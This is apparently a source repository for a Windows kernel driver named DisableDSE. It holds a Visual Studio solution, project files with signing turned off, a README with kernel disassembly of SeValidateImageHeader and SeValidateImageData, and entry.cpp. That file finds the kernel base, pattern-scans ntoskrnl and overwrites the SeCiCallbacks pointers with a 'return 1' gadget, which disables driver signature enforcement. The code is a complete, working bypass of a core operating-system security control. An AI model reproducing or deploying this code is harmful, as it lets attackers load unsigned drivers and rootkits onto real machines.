Project Path: arc_gmh5225_DisableDSE_755qrj69

Source Tree:

```txt
arc_gmh5225_DisableDSE_755qrj69
├── DisableDSE
│   ├── DisableDSE.vcxproj
│   ├── DisableDSE.vcxproj.filters
│   ├── DisableDSE.vcxproj.user
│   └── entry.cpp
├── DisableDSE.sln
└── README.md

```

`DisableDSE.sln`:

```sln

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.34407.143
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DisableDSE", "DisableDSE\DisableDSE.vcxproj", "{FD8238C9-CBB7-42D4-8045-FF44745413DE}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Debug|x64.ActiveCfg = Debug|x64
		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Debug|x64.Build.0 = Debug|x64
		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Debug|x64.Deploy.0 = Debug|x64
		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Release|x64.ActiveCfg = Release|x64
		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Release|x64.Build.0 = Release|x64
		{FD8238C9-CBB7-42D4-8045-FF44745413DE}.Release|x64.Deploy.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {0C93C634-99DE-4F64-8657-28E4C62E8A14}
	EndGlobalSection
EndGlobal

```

`DisableDSE/DisableDSE.vcxproj`:

```vcxproj
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|x64">
      <Configuration>Debug</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|x64">
      <Configuration>Release</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
  </ItemGroup>
  <PropertyGroup Label="Globals">
    <ProjectGuid>{FD8238C9-CBB7-42D4-8045-FF44745413DE}</ProjectGuid>
    <TemplateGuid>{dd38f7fc-d7bd-488b-9242-7d8754cde80d}</TemplateGuid>
    <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
    <MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
    <Configuration>Debug</Configuration>
    <Platform Condition="'$(Platform)' == ''">Win32</Platform>
    <RootNamespace>DisableDSE</RootNamespace>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <TargetVersion>Windows10</TargetVersion>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
    <ConfigurationType>Driver</ConfigurationType>
    <DriverType>WDM</DriverType>
    <Driver_SpectreMitigation>false</Driver_SpectreMitigation>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <TargetVersion>Windows10</TargetVersion>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
    <ConfigurationType>Driver</ConfigurationType>
    <DriverType>WDM</DriverType>
    <Driver_SpectreMitigation>false</Driver_SpectreMitigation>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
  </ImportGroup>
  <ImportGroup Label="PropertySheets">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
    <EnableInf2cat>false</EnableInf2cat>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
    <EnableInf2cat>false</EnableInf2cat>
  </PropertyGroup>
  <ItemGroup>
    <FilesToPackage Include="$(TargetPath)" />
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="entry.cpp" />
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
  </ImportGroup>
</Project>
```

`DisableDSE/DisableDSE.vcxproj.filters`:

```filters
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Filter Include="Source Files">
      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
    </Filter>
    <Filter Include="Header Files">
      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
    </Filter>
    <Filter Include="Resource Files">
      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
    </Filter>
    <Filter Include="Driver Files">
      <UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
      <Extensions>inf;inv;inx;mof;mc;</Extensions>
    </Filter>
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="entry.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
  </ItemGroup>
</Project>
```

`DisableDSE/DisableDSE.vcxproj.user`:

```user
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <SignMode>Off</SignMode>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <SignMode>Off</SignMode>
  </PropertyGroup>
</Project>
```

`DisableDSE/entry.cpp`:

```cpp
#include <ntifs.h>

#define InRange(x, a, b) (x >= a && x <= b) 
#define GetBits(x) (InRange(x, '0', '9') ? (x - '0') : ((x - 'A') + 0xA))
#define GetByte(x) ((UCHAR)(GetBits(x[0]) << 4 | GetBits(x[1])))


ULONG64 FindPattern(PVOID Base, SIZE_T Size, PCHAR Pattern)
{
    PUCHAR ModuleStart = (PUCHAR)Base;
    PUCHAR ModuleEnd = (PUCHAR)(ModuleStart + Size);

    PUCHAR FirstMatch = nullptr;
    const char* CurPatt = Pattern;
    for (; ModuleStart < ModuleEnd; ++ModuleStart)
    {
        bool SkiPUCHAR = (*CurPatt == '\?');
        if (SkiPUCHAR || *ModuleStart == GetByte(CurPatt)) {
            if (!FirstMatch) FirstMatch = ModuleStart;
            SkiPUCHAR ? CurPatt += 2 : CurPatt += 3;
            if (CurPatt[-1] == 0) return (ULONG64)FirstMatch;
        }
        else if (FirstMatch) {
            ModuleStart = FirstMatch;
            FirstMatch = nullptr;
            CurPatt = Pattern;
        }
    }
    return NULL;
}

PVOID GetKernelBase()
{
    auto IdtBase = *(ULONG64*)(__readgsqword(0x18) + 0x38);     // x64 kernel mode only
    auto Start = *(ULONG64*)(IdtBase + 4) & 0xFFFFFFFFFFFF0000;
    for (auto Page = (PUCHAR)Start; Page > (PUCHAR)Start - 0xB00000; Page -= 0x1000) {
        for (int i = 0; i < 0xFF9; ++i) {
            if (*(USHORT*)&Page[i] == 0x8D48 && Page[i + 2] == 0x1D && Page[i + 6] == 0xFF) {
                auto KernelBase = &Page[i] + 7 + *(int*)&Page[i + 3];
                if (((ULONG64)KernelBase & 0xFFF) == 0)
                    return KernelBase;
            }
        }
    }
    return NULL;
}

NTSTATUS DisableDSE()
{
    auto ntoskrnl = GetKernelBase();

    // Build 17763~22621
    auto Found = FindPattern(ntoskrnl, 0xB00000, "48 39 35 ? ? ? ? 48 8B F9 48 89 70 F0 44 8B DE");
    if (!Found)
        return STATUS_NOT_FOUND;
    auto pCiValidateImageHeader = Found + *(int*)(Found + 3) + 7;
    auto pCiValidateImageData = pCiValidateImageHeader + 8;

    // mov eax, 1  ret
    // To make CiValidateImage* return NT_SUCCESS value
    auto MovRet = FindPattern(ntoskrnl, 0xB00000, "B8 01 00 00 00 C3");
    
    // Overwrite .data pointer
    *(ULONG64*)pCiValidateImageHeader = MovRet;
    *(ULONG64*)pCiValidateImageData = MovRet;

    return STATUS_SUCCESS;
}

EXTERN_C NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
	UNREFERENCED_PARAMETER(RegistryPath);
	NTSTATUS status = STATUS_SUCCESS;
	KdPrint(("[DDSE] DriverEntry\n"));

	DriverObject->DriverUnload = [](PDRIVER_OBJECT DriverObject)->VOID {
		UNREFERENCED_PARAMETER(DriverObject);
	};

    status = DisableDSE();
    if (!NT_SUCCESS(status)) {
        KdPrint(("[DDSE] Disable DSE failed with status: %X\n", status));
        return status;
    }
    KdPrint(("[DDSE] Disable DSE Success!\n"));
    return status;
}

```

`README.md`:

```md

# DisableDSE

### DSE Call Stack
```cpp
nt!SeValidateImageHeader
nt!MiValidateSectionCreate+0x436
nt!MiValidateSectionSigningPolicy+0xa6
nt!MiCreateNewSection+0x5ad
nt!MiCreateImageOrDataSection+0x2d0
nt!MiCreateSection+0xf4
nt!MiCreateSystemSection+0xa0
nt!MiCreateSectionForDriver+0x125
nt!MiObtainSectionForDriver+0xa6
nt!MmLoadSystemImageEx+0xd7
nt!MmLoadSystemImage+0x26
nt!IopLoadDriver+0x224
nt!IopLoadUnloadDriver+0x4e
nt!ExpWorkerThread+0x105
nt!PspSystemThreadStartup+0x55
nt!KiStartSystemThread+0x2a
```

### SeValidateImageHeader and SeValidateImageData

```assembly
nt!SeValidateImageHeader:
fffff805`3b882f20 488bc4          mov     rax,rsp
fffff805`3b882f23 48895808        mov     qword ptr [rax+8],rbx
fffff805`3b882f27 48897010        mov     qword ptr [rax+10h],rsi
fffff805`3b882f2b 57              push    rdi
fffff805`3b882f2c 4881eca0000000  sub     rsp,0A0h
fffff805`3b882f33 33f6            xor     esi,esi
fffff805`3b882f35 488bda          mov     rbx,rdx
fffff805`3b882f38 4839354155dbff  cmp     qword ptr [nt!SeCiCallbacks+0x20 (ffff805`3b638480)],rsi
fffff805`3b882f3f 488bf9          mov     rdi,rcx
fffff805`3b882f42 488970f0        mov     qword ptr [rax-10h],rsi
fffff805`3b882f46 448bde          mov     r11d,esi
fffff805`3b882f49 0f8451301500    je      nt!SeValidateImageHeader+0x153080 (fffff805`3b9d5fa0)
fffff805`3b882f4f 8b9424f0000000  mov     edx,dword ptr [rsp+0F0h]
fffff805`3b882f56 f6c201          test    dl,1
fffff805`3b882f59 0f85c1000000    jne     nt!SeValidateImageHeader+0x100 (fffff805`3b883020)
...

nt!SeValidateImageData:
fffff805`3b8833a0 4883ec48        sub     rsp,48h
fffff805`3b8833a4 488b05dd50dbff  mov     rax,qword ptr [nt!SeCiCallbacks+0x28 (fffff805`3b638488)]
fffff805`3b8833ab 4c8bd1          mov     r10,rcx
fffff805`3b8833ae 4885c0          test    rax,rax
fffff805`3b8833b1 741f            je      nt!SeValidateImageData+0x32 (fffff805`3b8833d2)
fffff805`3b8833b3 488b4c2478      mov     rcx,qword ptr [rsp+78h]
fffff805`3b8833b8 48894c2428      mov     qword ptr [rsp+28h],rcx
fffff805`3b8833bd 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff805`3b8833c1 894c2420        mov     dword ptr [rsp+20h],ecx
fffff805`3b8833c5 498bca          mov     rcx,r10
fffff805`3b8833c8 e86369b4ff      call    nt!guard_dispatch_icall (fffff805`3b3c9d30)
fffff805`3b8833cd 4883c448        add     rsp,48h
fffff805`3b8833d1 c3              ret
```

nt!SeCiCallbacks+0x20 -> Address of CiValidateImageHeader

nt!SeCiCallbacks+0x28 -> Address of CiValidateImageData 

```